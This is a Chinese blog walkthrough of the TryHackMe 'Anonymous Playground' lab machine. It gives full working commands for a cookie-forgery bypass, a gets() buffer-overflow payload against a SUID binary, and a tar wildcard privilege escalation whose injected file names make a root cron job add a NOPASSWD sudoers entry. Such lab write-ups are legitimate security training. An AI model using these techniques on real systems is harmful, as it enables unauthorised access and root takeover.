[THM] Anonymous Playground

First Post:

2023-07-05

Last Update:

2023-07-06

Word Count:

5.1k

Read Time:

27 min

83410671_p0

前言

Anonymous Playground是TryHackMe上的一台hard难度的靶机，主要知识点是类仿射密码的解密、栈溢出利用以及tar提权。只要知识面充足这台机子还是很好解决的。

信息收集

端口、服务等扫描

┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace]
└─$ sudo nmap -p- --min-rate=10000 10.10.1.59                          
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 10:08 CST
Nmap scan report for 10.10.1.59
Host is up (0.30s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 16.86 seconds
                                                              
┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace]
└─$ sudo nmap -sV -sT -O -p22,80 10.10.1.59  
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 10:09 CST
Nmap scan report for 10.10.1.59
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.28 seconds

开了22和80端口，虽然不多但是够用。

漏扫

nmap脚本扫描

┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace]
└─$ sudo nmap --script=vuln 10.10.1.59     
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 10:10 CST
Nmap scan report for 10.10.1.59
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE                                                                         
22/tcp open  ssh                                                                             
80/tcp open  http
| http-sql-injection: 
|   Possible sqli for queries:
|     http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|_    http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http-enum: 
|   /robots.txt: Robots file
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-aspnet-debug: 
|_  status: DEBUG is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1

Nmap done: 1 IP address (1 host up) scanned in 52.40 seconds

SQL注入是误报，不用看了。robots.txt值得一看。http-aspnet-debug说明ASP.NET的debug模式是开着的，查了一下可能可以用来查看网站服务器敏感文件，然而并没有查到介绍具体利用方式的资料，就先作罢。

nikto

┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace]
└─$ sudo nikto -h 10.10.1.59          
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.1.59
+ Target Hostname:    10.10.1.59
+ Target Port:        80
+ Start Time:         2023-07-05 10:12:32 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie access created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Entry '/zYdHuAKjP/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8076 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-07-05 10:49:23 (GMT8) (2211 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

nikto也告诉我们，robots.txt文件中不希望我们访问/zYdHuAKjP/这个目录。此地无银三百两，真得看看。

web渗透

先访问下网址。

04624a40bf5e5b1ebecf57e7e7488c9a

Homepage经典V字仇杀队面具，然后没啥信息了。点开导航栏的Operatives看看。

4ae2fb644f0f58411124c4441c73a98a

发现一串id，说不定会有用户名啥的，先记住，cy一下。

点contact没反应。

那就先看看之前robots.txt中不想要我们的目录。

878f4c87710058e23d62ade69f3b1b40

发现说我们没被授权访问。我寻思你也妹让我登录啊，那就搞清楚咋回事。直接打开控制台看看request和response是啥情况。

c76da2e27ce666c8aa66dd3709ea5323

发现Cookie里面的access里面的value是denied。那我们直接改成granted试试能不能绕过这个授权检测。直接用curl发比较方便。当然用火狐的话可以直接resend里面改也可以。

┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace]
└─$ curl http://10.10.1.59/zYdHuAKjP/ -v -H "Cookie:access=granted"
*   Trying 10.10.1.59:80...
* Connected to 10.10.1.59 (10.10.1.59) port 80 (#0)
> GET /zYdHuAKjP/ HTTP/1.1
> Host: 10.10.1.59
> User-Agent: curl/7.88.1
> Accept: */*
> Cookie:access=granted
> 
< HTTP/1.1 200 OK
< Date: Wed, 05 Jul 2023 09:19:51 GMT
< Server: Apache/2.4.29 (Ubuntu)
< Set-Cookie: access=denied; expires=Fri, 04-Aug-2023 09:19:51 GMT; Max-Age=2592000; path=/
< Vary: Accept-Encoding
< Content-Length: 1379
< Content-Type: text/html; charset=UTF-8
< 

<!doctype html>


<html lang="en">

<head>
    <title>Proving Grounds</title>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="/css/bootstrap.min.css">
    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/main.css">

    <link rel="shortcut icon" href="/favicon.png" type="image/x-icon">
</head>

<body>
    <div class="container-fluid">
        <ul class="nav justify-content-center mb-3">
            <li class="nav-item">
                <a class="nav-link active text-white" href="/">Home</a>
            </li>
            <li class="nav-item">
                <a class="nav-link text-white" href="/operatives.php">Operatives</a>
            </li>
            <li class="nav-item">
                <a class="nav-link text-white" href="#">Contact</a>
            </li>
        </ul>

        <div class='row'>
            <div class='col'>
                <p class='text-center'>Access granted. <br />
                Well done getting this far.  But can you go further? <br /> <br />
                <span style='font-size: 30px;'>hEzAdCfHzA::hEzAdCfHzAhAiJzAeIaDjBcBhHgAzAfHfN</span>
                </p>
            </div>
        </div>
    </div>
</body>
* Connection #0 to host 10.10.1.59 left intact

解密密文

我们可以发现我们已经成功授权访问了，返回了一串不知道是啥的字符串：hEzAdCfHzA::hEzAdCfHzAhAiJzAeIaDjBcBhHgAzAfHfN。一眼看过去不像是hash值，也不像什么编码。中间的两个::在我们的/etc/passwd或者shadow中很常见，比较像用户名和密码。那么问题又来了，怎么解密这个密码呢。一开始没啥想法，通神在旁边指出用户名和密码前面一截是一样的，而且后面有一块是zAfH像是前面用户反过来的，加上字符都是一个大写一个小写形成一对，很像两个字符对应一个字符。

如果真的是这样的，那么前面的用户名就是一个5位的字符串，且第2位和第5位是一样的字符。这是时候想起之前我们发现的疑是用户名的那串名单，我们找找里面有没有符合以上条件的。发现还真有，就是magna。

第二个问题又来了，虽然找到一部分明文和对应的密文，但是这两个字母是如何映射到一个字母的还需考虑，也就是说代换表还待我们发现。

一开始很自然的就考虑到了ACSII码值，两个相减，发现不太对。又想到是不是字母表顺序，相减不对，相加其他都对，zA是27，如果解释为mod26就解释得通了。全部对应解出来，发现密码是一串有意义的短语，那很大概率是对了。所以总结起来其实这个映射就是。
$$
decrypt = (x + Y) mod 26
$$
两字母相加模26，得到的结果代表明文在字母表中的顺序。实际上是个很简单的映射，但是如果想不出来就尬住。

获取立足点

既然拿到了登录凭证，那我们直接ssh登录。

┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace]
└─$ ssh magna@10.10.1.59              
The authenticity of host '10.10.1.59 (10.10.1.59)' can't be established.
ED25519 key fingerprint is SHA256:zKvTLbgKsGoKUlP7w/r2yJkjWulPOJtp0DhBDy/GlFQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.1.59' (ED25519) to the list of known hosts.
magna@10.10.1.59's password: 
Permission denied, please try again.
magna@10.10.1.59's password: 
Permission denied, please try again.
magna@10.10.1.59's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-109-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jul  5 03:21:46 UTC 2023

  System load:  0.14               Processes:           97
  Usage of /:   22.9% of 19.56GB   Users logged in:     0
  Memory usage: 35%                IP address for eth0: 10.10.1.59
  Swap usage:   0%


3 packages can be updated.
0 updates are security updates.


Last login: Fri Jul 10 13:54:20 2020 from 192.168.86.65
magna@anonymous-playground:~$

成功登录，在home目录就能拿到第一个flag。

漏洞利用

缓冲区溢出

在home目录下，不仅有flag，还有点别的有意思的东西。

magna@anonymous-playground:~$ ls -la
total 64
drwxr-xr-x 7 magna  magna  4096 Jul 10  2020 .
drwxr-xr-x 5 root   root   4096 Jul  4  2020 ..
lrwxrwxrwx 1 root   root      9 Jul  4  2020 .bash_history -> /dev/null
-rw-r--r-- 1 magna  magna   220 Jul  4  2020 .bash_logout
-rw-r--r-- 1 magna  magna  3771 Jul  4  2020 .bashrc
drwx------ 2 magna  magna  4096 Jul  4  2020 .cache
drwxr-xr-x 3 magna  magna  4096 Jul  7  2020 .config
-r-------- 1 magna  magna    33 Jul  4  2020 flag.txt
drwx------ 3 magna  magna  4096 Jul  4  2020 .gnupg
-rwsr-xr-x 1 root   root   8528 Jul 10  2020 hacktheworld
drwxrwxr-x 3 magna  magna  4096 Jul  4  2020 .local
-rw-r--r-- 1 spooky spooky  324 Jul  6  2020 note_from_spooky.txt
-rw-r--r-- 1 magna  magna   807 Jul  4  2020 .profile
drwx------ 2 magna  magna  4096 Jul  4  2020 .ssh
-rw------- 1 magna  magna   817 Jul  7  2020 .viminfo

看看note_from_spooky.txt。

magna@anonymous-playground:~$ cat note_from_spooky.txt 
Hey Magna,

Check out this binary I made!  I've been practicing my skills in C so that I can get better at Reverse
Engineering and Malware Development.  I think this is a really good start.  See if you can break it!

P.S. I've had the admins install radare2 and gdb so you can debug and reverse it right here!

Best,
Spooky

发现spooky这小子要考考我们的逆向。那我们肯定要接受挑战。

（虽然他好心给我们装了radare2和gdb，但是用不太习惯，真得ida吧）

5c6d1e2fda21f

我们直接scp把文件下载下来，丢进我们心爱的ida。

找到main函数，按F5看一下伪代码。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[64]; // [rsp+10h] [rbp-40h] BYREF

  printf("Who do you want to hack? ");
  gets(v4);
  return 0;
}

关键词提取：gets(),我们最喜欢的缓冲区溢出。如果不太熟悉缓冲区溢出漏洞利用可以看看这篇文章,写的挺详细的。

发现了漏洞，那我们怎么利用呢，我们可以注意到函数里还有一个叫call_bash的函数，看看他是干吗的。

6f24b82247e629ffc7a4731efba78191

其中setuid(0x539u)其实就是设计S位（0x539u代表16进制无符号数，转换过来就是S）。然后就是调用sh。然而我们查看整个程序流程执行下来并不会执行这个函数。然而我们前面有缓冲区溢出的漏洞可以利用，那么接下来目标明确，构造payload覆盖返回地址，跳转到call_bash函数即可。

那么前面覆盖的数据要多大呢，char v4[64]; // [rsp+10h] [rbp-40h] BYREF告诉我们数组有64字节，再加上64位程序BP是8字节。所以一共要填充64+8=72位的字符，然后接上call_bash函数的返回地址0000000000400657，但是注意是小端存储所以要倒过来写。所以最终构造的payload如下：

1	`python -c "print 'a'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'"`

如果我们直接在命令行输入后面的16进制数会出问题，所以我们选择通过python输出，再管道符传给hacktheworld。

magna@anonymous-playground:~$ python -c "print 'a'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'" | ./hacktheworld 
Who do you want to hack? 
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
[Message corrupted]...Well...done.
Segmentation fault (core dumped)

我们可以发现我们已经成功调用了call_bash函数,但是最后还是给我们报了Segmentation fault (core dumped)错误。何意啊？说好的sh呢。

研究了一下，感觉可能是因为调用了sh后没有执行命令直接退出了。我们后面加个命令试试看吧。

magna@anonymous-playground:~$ (python -c "print 'a'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'"; cat) | ./hacktheworld 
Who do you want to hack? 
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
[Message corrupted]...Well...done.
whoami
Segmentation fault (core dumped)

还是不行，虽然好像是可以了，但是输入命令后就会错误退出。奇了怪了。百思不得其解，去查了下别人的wp发现是将\x57改成\x58就可以了，很奇怪。明明函数的起始地址是57，且我们已经成功调用到了函数，为啥会有这种问题。非常不可名状。

magna@anonymous-playground:~$ (python -c "print 'a'*72+'\x58\x06\x40\x00\x00\x00\x00\x00'"; cat) | ./hacktheworld
Who do you want to hack? 
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
[Message corrupted]...Well...done.
whoami
spooky
python -c "import pty;pty.spawn('/bin/bash')"
spooky@anonymous-playground:~$

虽然没法解释但是成功了。那就接着往下走吧。

提权

获得了spooky的权限，在home目录下能到第二个flag。

spooky@anonymous-playground:/home/spooky$ ls -la
ls -la
total 36
drwxr-xr-x 4 spooky spooky 4096 Jul 10  2020 .
drwxr-xr-x 5 root   root   4096 Jul  4  2020 ..
lrwxrwxrwx 1 root   root      9 Jul  4  2020 .bash_history -> /dev/null
-rw-r--r-- 1 spooky spooky  220 Jul  4  2020 .bash_logout
-rw-r--r-- 1 spooky spooky 3771 Jul  4  2020 .bashrc
-rwxrwxrwx 1 spooky magna     0 Jul 10  2020 .confrc
-r-------- 1 spooky spooky   33 Jul  4  2020 flag.txt
drwxrwxr-x 3 spooky spooky 4096 Jul  5  2020 .local
-rw-r--r-- 1 spooky spooky  807 Jul  4  2020 .profile
drwx------ 2 spooky spooky 4096 Jul  8  2020 .ssh
-rw-rw-r-- 1 spooky magna   535 Jul 10  2020 .webscript

其中这个.webscript文件很可疑，看看它的内容。

spooky@anonymous-playground:/home/spooky$ cat .web
cat .webscript 
#!/bin/sh

# get current user uid / gid
CURR_UID="$(id -u)"
CURR_GID="$(id -g)"

# save file
cat > .cachefile.c << EOF
#include <stdio.h>
int main()
{
setuid($CURR_UID);
setgid($CURR_GID);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF

# make folder where the payload will be saved
mkdir .cache
chmod 755 .cache

# compile & give SUID
gcc -w .cachefile.c -o .cache/.cachefile
chmod 4755 .cache/.cachefile

# clean up
rm -rf ./'--checkpoint=1'
rm -rf ./'--checkpoint-action=exec=sh .webscript'
rm -rf .webscript
rm -rf .cachefile.c

一路看下来这不是tar提权的典型应用吗？这是作者的提示吗？那我们看看定时任务里面是不是有tar自动打包任务吧。

spooky@anonymous-playground:/home/dev$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/1 *   * * *   root    cd /home/spooky && tar -zcf /var/backups/spooky.tgz *
#

果不其然，确实有。而且tar *,那就可以直接利用了。

tar提权

tar提权第一步，先写好利用脚本。

spooky@anonymous-playground:/home/spooky$ echo '#!/bin/bash' > exp.sh
echo '#!/bin/bash' > exp.sh
spooky@anonymous-playground:/home/spooky$ echo '' >> exp.sh
echo '' >> exp.sh
spooky@anonymous-playground:/home/spooky$ echo 'echo "spooky ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> exp.sh
ALL" >> /etc/sudoers' >> exp.shPASSWD:A
spooky@anonymous-playground:/home/spooky$ cat exp.sh
cat exp.sh
#!/bin/bash
echo "spooky ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

我们希望把当前用户写入sudoers用户组，之后就可以为所欲为。

第二步创建checkpoint。

spooky@anonymous-playground:/home/spooky$ echo '' > '--checkpoint-action=exec=sh exp.sh'   
 exp.sh'> '--checkpoint-action=exec=sh 
spooky@anonymous-playground:/home/spooky$ echo '' > --checkpoint=1
echo '' > --checkpoint=1
spooky@anonymous-playground:/home/spooky$ ls -la
ls -la
total 48
drwxr-xr-x 4 spooky spooky 4096 Jul  5 09:05  .
drwxr-xr-x 5 root   root   4096 Jul  4  2020  ..
lrwxrwxrwx 1 root   root      9 Jul  4  2020  .bash_history -> /dev/null
-rw-r--r-- 1 spooky spooky  220 Jul  4  2020  .bash_logout
-rw-r--r-- 1 spooky spooky 3771 Jul  4  2020  .bashrc
-rw-rw-r-- 1 spooky magna     1 Jul  5 09:05 '--checkpoint=1'
-rw-rw-r-- 1 spooky magna     1 Jul  5 09:04 '--checkpoint-action=exec=sh exp.sh'
-rwxrwxrwx 1 spooky magna     0 Jul 10  2020  .confrc
-rw-rw-r-- 1 spooky magna    66 Jul  5 09:02  exp.sh
-r-------- 1 spooky spooky   33 Jul  4  2020  flag.txt
drwxrwxr-x 3 spooky spooky 4096 Jul  5  2020  .local
-rw-r--r-- 1 spooky spooky  807 Jul  4  2020  .profile
drwx------ 2 spooky spooky 4096 Jul  8  2020  .ssh
-rw-rw-r-- 1 spooky magna   535 Jul 10  2020  .webscript

第三步猎人布下了陷阱正在等待猎物。因为定时任务表里是*/1应该是每分钟都会执行一次，所以很快就会出结果。

过了一会尝试sudo -l发现搞定了。

spooky@anonymous-playground:/home/spooky$ sudo -l
sudo -l
Matching Defaults entries for spooky on anonymous-playground:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User spooky may run the following commands on anonymous-playground:
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
spooky@anonymous-playground:/home/spooky$ sudo su
sudo su
root@anonymous-playground:/home/spooky# cd /root
cd /root
root@anonymous-playground:~# ls -la
ls -la
total 408
drwx------  7 root root   4096 Jul  8  2020 .
drwxr-xr-x 24 root root   4096 Jul  4  2020 ..
lrwxrwxrwx  1 root root      9 Jul  4  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root   3106 Apr  9  2018 .bashrc
drwx------  3 root root   4096 Jul  6  2020 .cache
drwxr-xr-x  3 root root   4096 Jul  7  2020 .config
-r--------  1 root root     33 Jul  4  2020 flag.txt
-rw-------  1 root root    242 Jul  8  2020 .gdb_history
-rw-r--r--  1 root root     29 Jul  7  2020 .gdbinit
-rw-r--r--  1 root root 356593 Jul  7  2020 .gdbinit-gef.py
drwx------  3 root root   4096 Jul  4  2020 .gnupg
drwxr-xr-x  3 root root   4096 Jul  4  2020 .local
-rw-r--r--  1 root root    148 Aug 17  2015 .profile
-rw-r--r--  1 root root     66 Jul  5  2020 .selected_editor
drwx------  2 root root   4096 Jul  7  2020 .ssh
-rw-r--r--  1 root root    215 Jul  7  2020 .wget-hsts
root@anonymous-playground:~# cat flag.txt

拿到root flag。

总结

这台机子比较偏向ctf，各方向知识点都有点，虽然都不难，但是要求我们开阔知识面。每样都得会点。

≡